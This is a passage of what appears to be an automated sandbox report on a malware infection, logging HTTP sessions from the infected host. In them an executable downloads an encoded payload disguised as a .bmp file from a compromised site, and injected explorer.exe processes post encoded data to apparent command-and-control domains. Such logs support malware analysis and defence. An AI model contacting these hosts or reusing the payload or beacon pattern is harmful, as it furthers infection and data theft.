79 6b 63 67 5a 6a 68 78 6e 40 68 66 57 43 06 73 5a 6c 40 79 68 6a 6e 4c 63 43 06 73 5a 6c 42 78 7a 6a 68 66 53 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6c 50 78 68 6a 68 64 51 7f 63 67 50 4a 68 78 68 6a 16 25 71 6b 67 1c 5e 62 68 7c 51 7e 68 66 79 4d 43 67 5a 6a 68 40 61 6a 68 66 41 ac 9c 98 a5 94 64 78 68 2f 69 66 79 6b 66 67 5a 6a 50 78 68 6a 68 4c 6b 6b 63 67 70 6a 68 78
                                                                                Data Ascii: 0xkjhf}kcghxjhfykcgjhxhjhfykcgZjhxhjhfykcgZjhxhjhfykcgjhxfuhyj{i4K<C(H.JHYG%;XWfnm~jhxhjhf).cgkkxykcgZjhxjfGrjegZHxhlhfykcgTHxhJhfyCgZj(xhJhfyicg^jhxhjhf}kcgZjhxhJIfyicgZjhxkj(yksgZzhxhjxfy{cgZjhxxjhfykcgZjhxHf2kcgZHxihfykcgZjhxhjhfykcgZjIxdjhfykcgZjhxhjhfykcgZjhxhjhfykcgZjhxhjhfykcgZjhxhjhfyKcgRjhxhjhfykcgRJhx jhfykcgZjhxFkcgNHxhJhfyCgZhhxhjhfykcgZjhxHjhW9jhxihfyCgZnhxhHfykcgZjhxhjhf9kcthfukcgZjIxhhhfyCgZjhxhjhfykcgjh:hjhfykcgZjhxhjhfCgZjhx jhf{kfg0fxefxkcgZjhxWtfggZjhxhjhfykcgZjhxhjhfykcgZjhxhjhfykcgZjhxn@hfWCsZl@yhjnLcCsZlBxzjhfSkcgZjhxhjhfykcgZlPxhjhdQcgPJhxhj%qkg^bh|Q~hfyMCgZjh@ajhfAdxh/ifykfgZjPxhjhLkkcgpjhx
                                                                                Nov 22, 2022 05:09:09.465481997 CET700INData Raw: 68 6a 68 66 79 6b 63 67 5a 6a 68 78 42 6a 68 66 6b 6b 63 70 70 6a 68 78 69 40 68 66 6b 6b 63 73 70 6a 68 78 72 42 0d 72 79 6d 49 67 48 6a 68 78 42 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6d 5b 67 5a 6a 68 7a 40 7e 68 66 73 53 37 67 5a 6a
                                                                                Data Ascii: hjhfykcgZjhxBjhfkkcppjhxi@hfkkcspjhxrBrymIgHjhxBjhfykcgZjhxhjhfym[gZjhz@~hfsS7gZjPukc"Xjhxjhf|kcgb5hxhhqkgOh~`f}C'rZl~hjlFykcg$)`xlnyoZ^HjhfySj{nhf}KbgZj;`jlKccccLHfykc_BjhfkkcgpjhxhjhfykcgZjhxh/jfykWgZjmxhjP
                                                                                Nov 22, 2022 05:09:09.465524912 CET701INData Raw: da 95 9c 98 58 68 13 73 68 6a 6c 1b 7c 6b 63 63 62 a7 97 87 97 68 13 6d 79 6b 67 74 59 52 6c 87 97 95 79 67 43 bd 9d 98 a5 52 d0 86 97 95 50 43 86 94 9c 5f 87 95 97 87 6a 68 13 6d 79 6b 67 76 58 79 6e 6b 6f 75 96 15 6c 6b 63 61 7f 7b 6f 05 7d 6a
                                                                                Data Ascii: Xhshjl|kccbhmykgtYRlygCRPC_jhmykgvXynkoulkca{o}jhb\zeIjh||hfsogZnPnhjhdnhgZnPkkcgb3hwocg^Jaxhj%qkgmh|QcMCvZjh@{ikZjljhlfcg^R.~uyKigZjvmjPe!chxl{lq agZnHthjh:ccc!oxlPE
                                                                                Nov 22, 2022 05:09:09.465565920 CET703INData Raw: 21 7e 68 78 6c 4a 53 7d 32 02 3a 08 43 6a 68 72 48 6e 68 66 79 15 20 6f 5a 6e 13 67 60 6a 6c 5f 5b 94 9c 98 7c 4a 68 78 68 6a 50 71 86 94 9c 65 21 78 68 78 6c 68 13 70 79 6b 67 7a 03 05 71 78 68 60 50 2c 79 6b 63 65 58 11 7e 78 68 6e 15 76 79 6b
                                                                                Data Ascii: !~hxlJS}2:CjhrHnhfy oZng`jl_[|JhxhjPqe!xhxlhpykgzqxh`P,ykceX~xhnvykgG]jhx)`f}MoZnR@YlcgZRjvkccIkHzhjh^KkCNAzhs~jhbAkcgZRjokccE*(F|kcgdhxPzb^PkcgHjhnBjhfkkcgpjhxzjhrSkcgTjhyBjhfkkcspjh
                                                                                Nov 22, 2022 05:09:09.465606928 CET704INData Raw: 68 6e 50 16 86 94 9c 65 4f 17 70 78 68 6e 50 55 78 6b 63 71 49 6f 48 7a 68 6a 68 5e 93 95 9c 98 58 7b 6a 05 71 6a 68 62 41 33 63 67 5a 7c 7b 7d 48 66 68 66 79 53 b3 99 a5 95 79 7a 48 88 cf 2d 1c 0a 70 65 7a 62 68 78 68 52 d4 98 86 94 61 19 31 62
                                                                                Data Ascii: hnPeOpxhnPUxkcqIoHzhjh^X{jqjhbA3cgZ|{}HfhfySyzH-pezbhxhRa1bh|@}fS[gZjjgpfyoCgZjh+bhbukg^SNFykcgbhakccznhxhR=Xxjhfecgb7}{cAcgZ{iA'YlcgZR jdkccM3{{PhfyiyZjljhl{xgZnkjRrezlFh
                                                                                Nov 22, 2022 05:09:09.465745926 CET705INData Raw: 7c 6b 63 6a 5e 6a 68 49 6b 6a 68 24 7d 6b 63 49 5c 6a 68 5c 6e 6a 68 b7 7a 6b 63 d9 5b 6a 68 b7 68 6a 68 39 7a 6b 63 d5 5f 6a 68 19 6c 6a 68 67 7f 6b 63 64 5e 6a 68 62 69 6a 68 58 78 6b 63 5f 46 6e 68 78 79 61 77 5d 18 78 68 47 57 6a 68 78 16 29
                                                                                Data Ascii: |kcj^jhIkjh$}kcI\jh\njhzkc[jhhjh9zkc_jhljhgkcd^jhbijhXxkc_Fnhxyaw]xhGWjhx)`f}{oZnRS@YccgZRHPzkcG~jhxP{SgZjHphjh^{KiwC0/kfykcZjzhj,fyk[Zjh@ihfAQfgZ{lgQ3-eykcTijhB|kcG_jhx)`f}JoZnR@YgcgZRP{kc_nhxsyoFYkc
                                                                                Nov 22, 2022 05:09:09.465794086 CET706INData Raw: dc 91 97 87 79 6c 77 5b 18 78 65 5f 33 96 97 87 77 96 7b 63 59 6f 63 67 5a 14 2b 70 68 6e 13 6a 71 6b 67 5e 38 91 97 87 4e 4a 69 66 79 6b 5b 30 a1 95 97 40 b5 94 97 99 59 6d 63 67 5a 52 20 83 97 95 50 48 79 6b 63 5f bd 6a 68 78 7f 79 6c 5e 7c 94
                                                                                Data Ascii: ylw[xe_3w{cYocgZ+phnjqkg^8NJifyk[0@YmcgZR PHykc_jhxyl^|Knw@yl^&LRyzhjPm{kc_Phfyzdx`{PJtt]JAxhjPzjh|{`Hzykc_P5S~fZjw{iP1xkc_H}hfySw{hPpIlH_hjh^E{xHJhfySXhjlrjpozsh
                                                                                Nov 22, 2022 05:09:09.465886116 CET707INData Raw: 97 95 50 f9 7d 6b 63 47 52 6a 68 78 50 df 96 99 86 74 1c 74 5e 52 0b 7b 68 6a 77 96 6a 6b 43 4f 5a 6a 68 06 2b 62 68 62 02 24 6b 67 5e 50 fc 86 97 95 4e 46 6a 6b 63 67 62 e3 96 87 97 52 6f 63 79 6b 5b f3 5a 6a 68 40 e7 6a 68 66 41 ca 60 67 5a 7d
                                                                                Data Ascii: P}kcGRjhxPtt^R{hjwjkCOZjh+bhb$kg^PNFjkcgbRocyk[Zjh@jhfA`gZ}{{PifySeZjHzhjh:ccc!d`xlP<EGIjhxP#SdZjH[hjhwbc_hylw& .`gZj{hjbykPkijh^'kcgb'ufuzKzgZjP{^?kcgz}hxhR|IlPkjhw|t\IoH|hjh^MyiXyjh
                                                                                Nov 22, 2022 05:09:09.465961933 CET708INData Raw: ba 94 9c 98 f2 91 97 87 48 71 68 66 79 15 20 6f 5a 6e 13 92 6f 6a 6c 5c d3 91 9c 98 7c 4a 60 78 68 6a 50 f9 83 94 9c 5f fc 96 97 87 50 1f 68 66 79 7d 70 63 7a 4a 68 78 68 52 e0 9c 86 94 7c 68 49 69 50 4e 94 95 97 79 03 78 64 5f 29 96 97 87 73 79
                                                                                Data Ascii: Hqhfy oZnojl\|J`xhjP_Phfy}pczJhxhR|hIiPNyxd_)syo^bRrbE\1=kjhfYdcgZR,PG^jhx)`f}soZnRS@YlcgZRHy`fWt\RDwjkCnZjh@nhi|[/kxhj+0Hsykcbh|V`f}RNXxjhfA
                                                                                Nov 22, 2022 05:09:09.466094017 CET709INData Raw: 40 42 0d 6c 68 6c 42 66 6b 6b 63 67 70 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6c 50 66 79 6b 63 65 72 7e 68 78 62 4a 68 66 79 6b 1d 24 52 6a 6c 03 9f 6d 68 62 43 7f 63 67 5a 4c 48 78 68 6a 68 5e 70 6b 63 67 62 ad 97 87 97 94 64 66 79 2e
                                                                                Data Ascii: @BlhlBfkkcgpjhxhjhfykcgZjhxhlPfykcer~hxbJhfyk$RjlmhbCcgZLHxhjh^pkcgbdfy.bgZjmxhjPfykcMDh[hjlLkkcgpjhxhjhfykcgZjhxzjhrSkcgHjhxBjhfykcgZjhxhjhfkkcspjhxzjhfSkcgbjhxh@hfkkcspjhxzjhfSkcgZjhxhjhfykcgHjhoBjhfxAcgHjhlBjhfcCsZlBxzjhfSkcgZjh
                                                                                Nov 22, 2022 05:09:09.619993925 CET710INData Raw: 97 95 77 1b 6a 6b 43 6c 5a 6a 68 06 2b 62 68 62 02 3a 6b 67 5e 53 13 85 97 95 4e 46 5b 6b 63 67 62 1a 95 87 97 7b 69 79 47 0a 70 66 7a 7c 68 78 68 52 37 9b 86 94 72 61 45 5c 09 6b 6e 4a 68 66 79 6b 1d 24 52 6a 6c 03 23 62 68 62 40 2f 9e 98 a5 4c
                                                                                Data Ascii: wjkClZjh+bhb:kg^SNF[kcgb{iyGpfz|hxhR7raE\knJhfyk$Rjl#bhb@/LHxhjh^@KjwG1/kfykL^!eykCaZjh+bhbrkg^PgNF~kcgbnRClZjh@AagZJbxhj%qkgkbh|QMCAZjh@fpfzNhxhR|IcPijh^z~hxhR|IlP


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.224917634.174.217.4280C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 22, 2022 05:09:16.979897022 CET2954OUTPOST / HTTP/1.1
                                                                                Cache-Control: no-cache
                                                                                Connection: Keep-Alive
                                                                                Pragma: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Accept: */*
                                                                                Referer: http://esplogem.ga/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                Content-Length: 1305
                                                                                Host: esplogem.ga
                                                                                Nov 22, 2022 05:09:16.979967117 CET2956OUTData Raw: 05 98 b3 99 cb 07 0e f3 a4 3f 35 ee 2b fc 9d 3c 01 7f c9 02 3b 98 8a ce a1 82 b6 33 50 7a 54 d5 5c 1a 95 c7 b5 f0 24 dc 60 a5 32 b6 c7 f3 b9 7a 6f 34 26 a0 31 c3 2e ed 78 47 29 1a 39 ba ac 2e ee a7 e6 6b 15 95 10 0f c5 6d 18 19 aa ea 10 94 37 bc
                                                                                Data Ascii: ?5+<;3PzT\$`2zo4&1.xG)9.km7W7#o4 UAbqG/.Fl&iv,|yW4YACw.r.9e\MF}"?49LCPasCxXvXk-M+vr[
                                                                                Nov 22, 2022 05:09:17.433695078 CET2956INHTTP/1.1 404 Not Found
                                                                                date: Tue, 22 Nov 2022 04:09:17 GMT
                                                                                server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                x-powered-by: PHP/5.6.40
                                                                                content-length: 327
                                                                                content-type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                7192.168.2.2249178183.78.168.2480C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 22, 2022 05:10:16.902812004 CET2964OUTGET /wp-content/Mzyroxbxfa.bmp HTTP/1.1
                                                                                Host: www.hzncars.com.my
                                                                                Connection: Keep-Alive
                                                                                Nov 22, 2022 05:10:17.058321953 CET2965INHTTP/1.1 200 OK
                                                                                Date: Tue, 22 Nov 2022 02:43:09 GMT
                                                                                Server: Apache/2
                                                                                Last-Modified: Mon, 21 Nov 2022 21:05:05 GMT
                                                                                ETag: "20b000-5ee0168e4b869"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 2142208
                                                                                Vary: Accept-Encoding,User-Agent
                                                                                Keep-Alive: timeout=2, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: image/bmp
                                                                                Data Raw: 17 30 f8 78 6b 6a 68 66 7d 6b 63 67 a5 95 68 78 d0 6a 68 66 79 6b 63 67 1a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 da 6a 68 78 66 75 d2 68 79 df 6a aa 7b d2 69 34 a5 4b 3c 0e 10 18 43 17 28 05 0f 0a 09 07 48 05 18 05 0d 08 2e 4a 0a 1d 48 18 1d 08 59 02 0d 47 1e 25 3b 58 05 05 0c 03 57 66 6e 6d 7e 6a 68 78 68 6a 68 66 29 2e 63 67 16 6b 6b 78 04 91 13 05 79 6b 63 67 5a 6a 68 78 88 6a 66 47 72 6a 65 67 5a c2 48 78 68 6c 68 66 79 6b 63 67 54 ad 48 78 68 4a 68 66 79 8b 43 67 5a 6a 28 78 68 4a 68 66 79 69 63 67 5e 6a 68 78 68 6a 68 66 7d 6b 63 67 5a 6a 68 78 68 4a 49 66 79 69 63 67 5a 6a 68 78 6b 6a 28 e3 79 6b 73 67 5a 7a 68 78 68 6a 78 66 79 7b 63 67 5a 6a 68 78 78 6a 68 66 79 6b 63 67 5a 6a 68 78 a8 ac 48 66 32 6b 63 67 5a 8a 48 78 04 69 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 49 78 64 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 4b 63 67 52 6a 68 78 68 6a 68 66 79 6b 63 67 52 4a 68 78 20 6a 68 66 79 6b 63 67 5a 6a 68 78 46 1e 0d 1e 0d 6b 63 67 4e cd 48 78 68 4a 68 66 79 c3 43 67 5a 68 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 48 6a 68 06 57 19 10 15 39 6a 68 78 04 69 68 66 79 8b 43 67 5a 6e 68 78 68 c0 48 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 39 6b 63 a7 74 18 0d 14 07 09 68 66 75 6b 63 67 5a 6a 49 78 68 68 68 66 79 c5 43 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 1a 6a 68 3a 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 89 ad 43 67 5a 6a 68 78 20 6a 68 66 7b 6b 66 67 a2 30 66 78 e8 88 65 66 78 6b 63 67 5a 6a 68 78 10 57 74 66 d3 ee 67 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 6e 40 68 66 57 43 06 73 5a 6c 40 79 68 6a 6e 4c 63 43 06 73 5a 6c 42 78 7a 6a 68 66 53 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6c 50 78 68 6a 68 64 51 7f 63 67 50 4a 68 78 68 6a 16 25 71 6b 67 1c 5e 62 68 7c 51 7e 68 66 79 4d 43 67 5a 6a 68 40 61 6a 68 66 41 ac 9c 98 a5 94 64 78 68 2f 69 66 79 6b 66 67 5a 6a 50 78 68 6a 68 4c 6b 6b 63 67 70 6a 68 78
                                                                                Data Ascii: 0xkjhf}kcghxjhfykcgjhxhjhfykcgZjhxhjhfykcgZjhxhjhfykcgjhxfuhyj{i4K<C(H.JHYG%;XWfnm~jhxhjhf).cgkkxykcgZjhxjfGrjegZHxhlhfykcgTHxhJhfyCgZj(xhJhfyicg^jhxhjhf}kcgZjhxhJIfyicgZjhxkj(yksgZzhxhjxfy{cgZjhxxjhfykcgZjhxHf2kcgZHxihfykcgZjhxhjhfykcgZjIxdjhfykcgZjhxhjhfykcgZjhxhjhfykcgZjhxhjhfykcgZjhxhjhfyKcgRjhxhjhfykcgRJhx jhfykcgZjhxFkcgNHxhJhfyCgZhhxhjhfykcgZjhxHjhW9jhxihfyCgZnhxhHfykcgZjhxhjhf9kcthfukcgZjIxhhhfyCgZjhxhjhfykcgjh:hjhfykcgZjhxhjhfCgZjhx jhf{kfg0fxefxkcgZjhxWtfggZjhxhjhfykcgZjhxhjhfykcgZjhxhjhfykcgZjhxn@hfWCsZl@yhjnLcCsZlBxzjhfSkcgZjhxhjhfykcgZlPxhjhdQcgPJhxhj%qkg^bh|Q~hfyMCgZjh@ajhfAdxh/ifykfgZjPxhjhLkkcgpjhx
                                                                                Nov 22, 2022 05:10:17.058372021 CET2966INData Raw: 68 6a 68 66 79 6b 63 67 5a 6a 68 78 42 6a 68 66 6b 6b 63 70 70 6a 68 78 69 40 68 66 6b 6b 63 73 70 6a 68 78 72 42 0d 72 79 6d 49 67 48 6a 68 78 42 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6d 5b 67 5a 6a 68 7a 40 7e 68 66 73 53 37 67 5a 6a
                                                                                Data Ascii: hjhfykcgZjhxBjhfkkcppjhxi@hfkkcspjhxrBrymIgHjhxBjhfykcgZjhxhjhfym[gZjhz@~hfsS7gZjPukc"Xjhxjhf|kcgb5hxhhqkgOh~`f}C'rZl~hjlFykcg$)`xlnyoZ^HjhfySj{nhf}KbgZj;`jlKccccLHfykc_BjhfkkcgpjhxhjhfykcgZjhxh/jfykWgZjmxhjP
                                                                                Nov 22, 2022 05:10:17.058501005 CET2967INData Raw: da 95 9c 98 58 68 13 73 68 6a 6c 1b 7c 6b 63 63 62 a7 97 87 97 68 13 6d 79 6b 67 74 59 52 6c 87 97 95 79 67 43 bd 9d 98 a5 52 d0 86 97 95 50 43 86 94 9c 5f 87 95 97 87 6a 68 13 6d 79 6b 67 76 58 79 6e 6b 6f 75 96 15 6c 6b 63 61 7f 7b 6f 05 7d 6a
                                                                                Data Ascii: Xhshjl|kccbhmykgtYRlygCRPC_jhmykgvXynkoulkca{o}jhb\zeIjh||hfsogZnPnhjhdnhgZnPkkcgb3hwocg^Jaxhj%qkgmh|QcMCvZjh@{ikZjljhlfcg^R.~uyKigZjvmjPe!chxl{lq agZnHthjh:ccc!oxlPE
                                                                                Nov 22, 2022 05:10:17.058543921 CET2968INData Raw: 21 7e 68 78 6c 4a 53 7d 32 02 3a 08 43 6a 68 72 48 6e 68 66 79 15 20 6f 5a 6e 13 67 60 6a 6c 5f 5b 94 9c 98 7c 4a 68 78 68 6a 50 71 86 94 9c 65 21 78 68 78 6c 68 13 70 79 6b 67 7a 03 05 71 78 68 60 50 2c 79 6b 63 65 58 11 7e 78 68 6e 15 76 79 6b
                                                                                Data Ascii: !~hxlJS}2:CjhrHnhfy oZng`jl_[|JhxhjPqe!xhxlhpykgzqxh`P,ykceX~xhnvykgG]jhx)`f}MoZnR@YlcgZRjvkccIkHzhjh^KkCNAzhs~jhbAkcgZRjokccE*(F|kcgdhxPzb^PkcgHjhnBjhfkkcgpjhxzjhrSkcgTjhyBjhfkkcspjh
                                                                                Nov 22, 2022 05:10:17.058666945 CET2969INData Raw: 68 6e 50 16 86 94 9c 65 4f 17 70 78 68 6e 50 55 78 6b 63 71 49 6f 48 7a 68 6a 68 5e 93 95 9c 98 58 7b 6a 05 71 6a 68 62 41 33 63 67 5a 7c 7b 7d 48 66 68 66 79 53 b3 99 a5 95 79 7a 48 88 cf 2d 1c 0a 70 65 7a 62 68 78 68 52 d4 98 86 94 61 19 31 62
                                                                                Data Ascii: hnPeOpxhnPUxkcqIoHzhjh^X{jqjhbA3cgZ|{}HfhfySyzH-pezbhxhRa1bh|@}fS[gZjjgpfyoCgZjh+bhbukg^SNFykcgbhakccznhxhR=Xxjhfecgb7}{cAcgZ{iA'YlcgZR jdkccM3{{PhfyiyZjljhl{xgZnkjRrezlFh
                                                                                Nov 22, 2022 05:10:17.058708906 CET2970INData Raw: 7c 6b 63 6a 5e 6a 68 49 6b 6a 68 24 7d 6b 63 49 5c 6a 68 5c 6e 6a 68 b7 7a 6b 63 d9 5b 6a 68 b7 68 6a 68 39 7a 6b 63 d5 5f 6a 68 19 6c 6a 68 67 7f 6b 63 64 5e 6a 68 62 69 6a 68 58 78 6b 63 5f 46 6e 68 78 79 61 77 5d 18 78 68 47 57 6a 68 78 16 29
                                                                                Data Ascii: |kcj^jhIkjh$}kcI\jh\njhzkc[jhhjh9zkc_jhljhgkcd^jhbijhXxkc_Fnhxyaw]xhGWjhx)`f}{oZnRS@YccgZRHPzkcG~jhxP{SgZjHphjh^{KiwC0/kfykcZjzhj,fyk[Zjh@ihfAQfgZ{lgQ3-eykcTijhB|kcG_jhx)`f}JoZnR@YgcgZRP{kc_nhxsyoFYkc
                                                                                Nov 22, 2022 05:10:17.058787107 CET2971INData Raw: dc 91 97 87 79 6c 77 5b 18 78 65 5f 33 96 97 87 77 96 7b 63 59 6f 63 67 5a 14 2b 70 68 6e 13 6a 71 6b 67 5e 38 91 97 87 4e 4a 69 66 79 6b 5b 30 a1 95 97 40 b5 94 97 99 59 6d 63 67 5a 52 20 83 97 95 50 48 79 6b 63 5f bd 6a 68 78 7f 79 6c 5e 7c 94
                                                                                Data Ascii: ylw[xe_3w{cYocgZ+phnjqkg^8NJifyk[0@YmcgZR PHykc_jhxyl^|Knw@yl^&LRyzhjPm{kc_Phfyzdx`{PJtt]JAxhjPzjh|{`Hzykc_P5S~fZjw{iP1xkc_H}hfySw{hPpIlH_hjh^E{xHJhfySXhjlrjpozsh
                                                                                Nov 22, 2022 05:10:17.058937073 CET2972INData Raw: 97 95 50 f9 7d 6b 63 47 52 6a 68 78 50 df 96 99 86 74 1c 74 5e 52 0b 7b 68 6a 77 96 6a 6b 43 4f 5a 6a 68 06 2b 62 68 62 02 24 6b 67 5e 50 fc 86 97 95 4e 46 6a 6b 63 67 62 e3 96 87 97 52 6f 63 79 6b 5b f3 5a 6a 68 40 e7 6a 68 66 41 ca 60 67 5a 7d
                                                                                Data Ascii: P}kcGRjhxPtt^R{hjwjkCOZjh+bhb$kg^PNFjkcgbRocyk[Zjh@jhfA`gZ}{{PifySeZjHzhjh:ccc!d`xlP<EGIjhxP#SdZjH[hjhwbc_hylw& .`gZj{hjbykPkijh^'kcgb'ufuzKzgZjP{^?kcgz}hxhR|IlPkjhw|t\IoH|hjh^MyiXyjh
                                                                                Nov 22, 2022 05:10:17.058979034 CET2974INData Raw: ba 94 9c 98 f2 91 97 87 48 71 68 66 79 15 20 6f 5a 6e 13 92 6f 6a 6c 5c d3 91 9c 98 7c 4a 60 78 68 6a 50 f9 83 94 9c 5f fc 96 97 87 50 1f 68 66 79 7d 70 63 7a 4a 68 78 68 52 e0 9c 86 94 7c 68 49 69 50 4e 94 95 97 79 03 78 64 5f 29 96 97 87 73 79
                                                                                Data Ascii: Hqhfy oZnojl\|J`xhjP_Phfy}pczJhxhR|hIiPNyxd_)syo^bRrbE\1=kjhfYdcgZR,PG^jhx)`f}soZnRS@YlcgZRHy`fWt\RDwjkCnZjh@nhi|[/kxhj+0Hsykcbh|V`f}RNXxjhfA
                                                                                Nov 22, 2022 05:10:17.059019089 CET2975INData Raw: 40 42 0d 6c 68 6c 42 66 6b 6b 63 67 70 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6c 50 66 79 6b 63 65 72 7e 68 78 62 4a 68 66 79 6b 1d 24 52 6a 6c 03 9f 6d 68 62 43 7f 63 67 5a 4c 48 78 68 6a 68 5e 70 6b 63 67 62 ad 97 87 97 94 64 66 79 2e
                                                                                Data Ascii: @BlhlBfkkcgpjhxhjhfykcgZjhxhlPfykcer~hxbJhfyk$RjlmhbCcgZLHxhjh^pkcgbdfy.bgZjmxhjPfykcMDh[hjlLkkcgpjhxhjhfykcgZjhxzjhrSkcgHjhxBjhfykcgZjhxhjhfkkcspjhxzjhfSkcgbjhxh@hfkkcspjhxzjhfSkcgZjhxhjhfykcgHjhoBjhfxAcgHjhlBjhfcCsZlBxzjhfSkcgZjh
                                                                                Nov 22, 2022 05:10:17.214607954 CET2976INData Raw: 97 95 77 1b 6a 6b 43 6c 5a 6a 68 06 2b 62 68 62 02 3a 6b 67 5e 53 13 85 97 95 4e 46 5b 6b 63 67 62 1a 95 87 97 7b 69 79 47 0a 70 66 7a 7c 68 78 68 52 37 9b 86 94 72 61 45 5c 09 6b 6e 4a 68 66 79 6b 1d 24 52 6a 6c 03 23 62 68 62 40 2f 9e 98 a5 4c
                                                                                Data Ascii: wjkClZjh+bhb:kg^SNF[kcgb{iyGpfz|hxhR7raE\knJhfyk$Rjl#bhb@/LHxhjh^@KjwG1/kfykL^!eykCaZjh+bhbrkg^PgNF~kcgbnRClZjh@AagZJbxhj%qkgkbh|QMCAZjh@fpfzNhxhR|IcPijh^z~hxhR|IlP


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                8192.168.2.224917934.174.217.4280C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 22, 2022 05:10:22.249874115 CET5001OUTPOST /xplor/inc/9689eb892f604a.php HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: dropbuyinc.ga
                                                                                Content-Length: 582
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Nov 22, 2022 05:10:22.601094961 CET5131OUTData Raw: 70 3d 4c 51 4e 36 6e 49 72 2f 45 58 67 30 25 32 42 4c 7a 4a 56 35 49 54 4e 44 73 56 73 48 67 73 47 6a 35 5a 76 68 58 46 48 75 57 32 53 4d 25 32 42 44 4f 6d 51 71 66 38 6a 64 65 6a 47 4b 34 31 4f 72 38 52 63 34 45 72 76 5a 32 63 72 4f 58 25 32 42
                                                                                Data Ascii: p=LQN6nIr/EXg0%2BLzJV5ITNDsVsHgsGj5ZvhXFHuW2SM%2BDOmQqf8jdejGK41Or8Rc4ErvZ2crOX%2BaLF8iLKB8JJLSsne0BWaIGs59aa8bc%2BnvOK0cE2M4nwAg/PJ35pVqqi1uoukwD1JCN5q27VnQvCjqmLtP5bn%2BchoI2WZw30xYH41Ot8vBesRsZvyBWLPIBEbyJycPN8bY3BF80HlcVI%2BThjSpXzq70yY1%2
                                                                                Nov 22, 2022 05:10:22.706423044 CET5198INHTTP/1.1 100 Continue
                                                                                Nov 22, 2022 05:10:22.923371077 CET5223INHTTP/1.1 200 OK
                                                                                date: Tue, 22 Nov 2022 04:10:22 GMT
                                                                                server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                                                x-powered-by: PHP/7.2.34
                                                                                content-length: 149
                                                                                content-type: text/html; charset=UTF-8
